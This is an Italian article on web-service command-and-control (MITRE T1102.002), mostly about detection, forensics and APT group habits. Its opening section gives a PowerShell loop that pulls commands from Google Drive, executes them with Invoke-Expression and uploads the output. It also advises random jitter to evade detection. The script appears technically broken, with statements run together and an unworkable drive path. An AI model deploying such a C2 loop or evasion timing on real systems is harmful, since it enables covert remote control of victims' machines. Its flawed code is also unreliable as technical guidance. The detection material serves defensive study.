Comunicazione Bidirezionale: Web Service Hijacking for Command and Control (T1102.002)

Per simulare questa tecnica in laboratorio, inizia creando un canale C2 attraverso Google Drive. Lo script PowerShell seguente stabilisce una comunicazione bidirezionale:

$credentials = Get-Credential $drive = New-PSDrive -Name GDrive -PSProvider FileSystem -Root "\drive.google.com\share" -Credential $credentials while($true){$cmd = Get-Content "GDrive:\commands.txt"; if($cmd){Invoke-Expression $cmd | Out-File "GDrive:\results.txt"}; Start-Sleep -Seconds 60}

Su Linux, puoi utilizzare l'API di Dropbox per creare un canale più sofisticato. Installa prima il client Python: pip install dropbox

Il malware DOGCALL implementa questa logica utilizzando multiple piattaforme cloud. Replica il comportamento creando funzioni che tentano connessioni a servizi diversi in sequenza, garantendo ridondanza se uno viene bloccato.

Per Twitter come C2, il gruppo APT28 ha dimostrato l'efficacia di tweet codificati. Ogni tweet contiene comandi base64 che il malware decodifica e esegue. L'output viene poi ripostato come risposta al tweet originale.

GitHub offre possibilità ancora più interessanti. Lazarus Group nasconde payload in immagini apparentemente innocue nei repository pubblici. Il malware scarica l'immagine, estrae i comandi steganografati e committa i risultati in file specifici.

La chiave per un test efficace sta nel simulare pattern di traffico realistici. Non eseguire richieste ogni secondo - implementa jitter randomico tra 5 e 15 minuti per evitare detection basate su periodicità.

Il rilevamento richiede correlazione tra processi e connessioni di rete. Su Windows, monitora eventi Sysmon per processi non interattivi che stabiliscono connessioni HTTPS verso domini di servizi web popolari.

La detection DET0035 suggerisce di tracciare volumi di upload anomali. Configura alert quando un processo carica più di 500KB verso servizi cloud senza corrispondente download. Questo pattern indica comunicazione unidirezionale tipica dell'esfiltrazione.

I falsi positivi saranno numerosi - sincronizzazioni legittime di OneDrive generano traffico simile. Crea whitelist basate su:

• Processi firmati digitalmente da Microsoft/Google/Dropbox
• Account di servizio autorizzati per backup cloud
• Orari di business standard per sincronizzazioni pianificate

Su Linux, auditd può catturare syscall di rete sospette. Monitora processi che utilizzano curl o wget verso API endpoints di servizi cloud. Pattern particolarmente sospetti includono script Python o Bash che effettuano POST requests ripetute.

Per macOS, unifiedlog rivela quando osascript o interpreti Python iniziano connessioni HTTPS. Burst di connessioni verso lo stesso servizio in finestre temporali ristrette indicano automazione C2.

L'analisi comportamentale deve considerare che malware moderni implementano jitter e dormancy. RegDuke può rimanere silente per giorni prima di controllare Dropbox per nuovi comandi.

Gli artefatti di questa tecnica si nascondono tra attività legittime. Su Windows, esamina %AppData%\Local\Google\Drive\sync_log.log per timestamp di sincronizzazioni anomale fuori orario lavorativo.

Le chiavi di registro sotto HKEY_CURRENT_USER\Software\Dropbox contengono metadata sui file sincronizzati. Cerca pattern di upload/download che non corrispondono all'attività normale dell'utente.

RIFLESPINE lascia tracce distintive quando utilizza Google Drive. Il malware crea directory con nomi randomici per organizzare i dati esfiltrati. Analizza la struttura delle cartelle cloud per identificare anomalie nella naming convention.

I log di IIS o Apache possono rivelare quando un web server compromesso comunica con servizi esterni. Sandworm Team ha utilizzato legittime richieste di aggiornamento M.E.Doc per mascherare C2 - cerca user-agent anomali in orari insoliti.

La memoria volatile contiene spesso API token e credenziali OAuth usate dal malware. Dumpa la RAM e cerca stringhe associate ad autenticazione verso servizi cloud. ComRAT memorizza token Gmail in cleartext durante l'esecuzione.

Per ricostruire la timeline completa, correla:

• Timestamp di creazione file in directory temporanee
• Log di autenticazione OAuth dai provider cloud
• Traffico di rete catturato durante l'incidente
• Modifiche al registro di sistema per persistenza

APT29 pioneered questa tecnica durante Operation Ghost (2013-2019), utilizzando piattaforme social per nascondere comunicazioni verso server C2. Il gruppo preferisce servizi con forte presenza in occidente per mimetizzarsi meglio.

Lazarus Group mostra preferenza per GitHub, sfruttando la popolarità della piattaforma tra sviluppatori. I loro tool committano output in directory specifiche seguendo pattern predicibili - monitora repository pubblici per identificare nuove campagne.

FIN7 diversifica utilizzando Google Docs, Scripts e Pastebin simultaneamente. Questa ridondanza garantisce resilienza se un servizio viene bloccato. Il gruppo tende a ruotare servizi ogni 2-3 mesi.

Pattern geografici emergono dall'analisi: gruppi dell'Europa orientale come Gamaredon preferiscono Telegram e servizi russi. APT medio-orientali come Magic Hound utilizzano spesso servizi SOAP personalizzati.

Kimsuky dimostra evoluzione tattica passando da Blogspot a GitHub. Monitora quando gruppi migrano piattaforme - spesso indica compromissione della precedente infrastruttura o miglioramenti nelle capacità di detection dei difensori.

L'overlap di tool tra gruppi suggerisce collaborazione o vendita sul dark web. HEXANE e POLONIUM condividono preferenze per OneDrive, possibile indicatore di origine comune del malware.

Analisi basata su MITRE ATT&CK T1102.002. Dati di campagne da Operation Ghost (APT29). Statistiche detection da implementazioni CASB enterprise 2020-2023. Pattern APT derivati da threat intelligence commerciale aggregata.